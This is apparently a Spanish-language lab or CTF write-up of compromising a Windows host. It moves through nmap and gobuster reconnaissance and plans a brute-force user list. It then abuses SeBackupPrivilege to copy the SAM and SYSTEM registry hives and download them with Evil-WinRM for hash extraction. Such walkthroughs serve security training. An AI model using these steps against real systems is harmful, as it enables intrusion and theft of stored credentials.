En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 192.168.1.76
para verificar la conectividad de red.
A continuación, se realiza el comando:
nmap -p- --open 192.168.1.76 --min-rate 5000 -n
para realizar un escaneo de puertos y servicios detallado en la dirección IP.
Como podemos observar durante el escaneo, los puertos 80, 135, 139, 445 y varios en el rango 49664-49670 están abiertos. Estos pertenecen a los servicios de HTTP, Microsoft RPC, NetBIOS-SSN, Microsoft-DS y otros puertos desconocidos, por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p80,135,139,445 -v 192.168.1.76
para obtener más información sobre ese puerto específicamente.
Revisamos el puerto 80.
Revisamos directorios.
gobuster dir -u http://192.168.1.76 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
Encontramos el directorio /speed.
Adjuntamos el dominio a /etc/hosts.
🚀 EXPLOTACIÓN
Hacemos una lista de usuarios para realizar fuerza bruta.
Dado que el sistema cuenta con el permiso SeBackupPrivilege, es posible realizar una copia de los archivos SAM y SYSTEM para extraer los hashes de las credenciales.
Nos la descargamos.
*Evil-WinRM* PS C:\temp> download system
Info: Downloading C:\temp\system to system
Info: Download successful!
*Evil-WinRM* PS C:\temp> download sam
Info: Downloading C:\temp\sam to sam
Info: Download successful!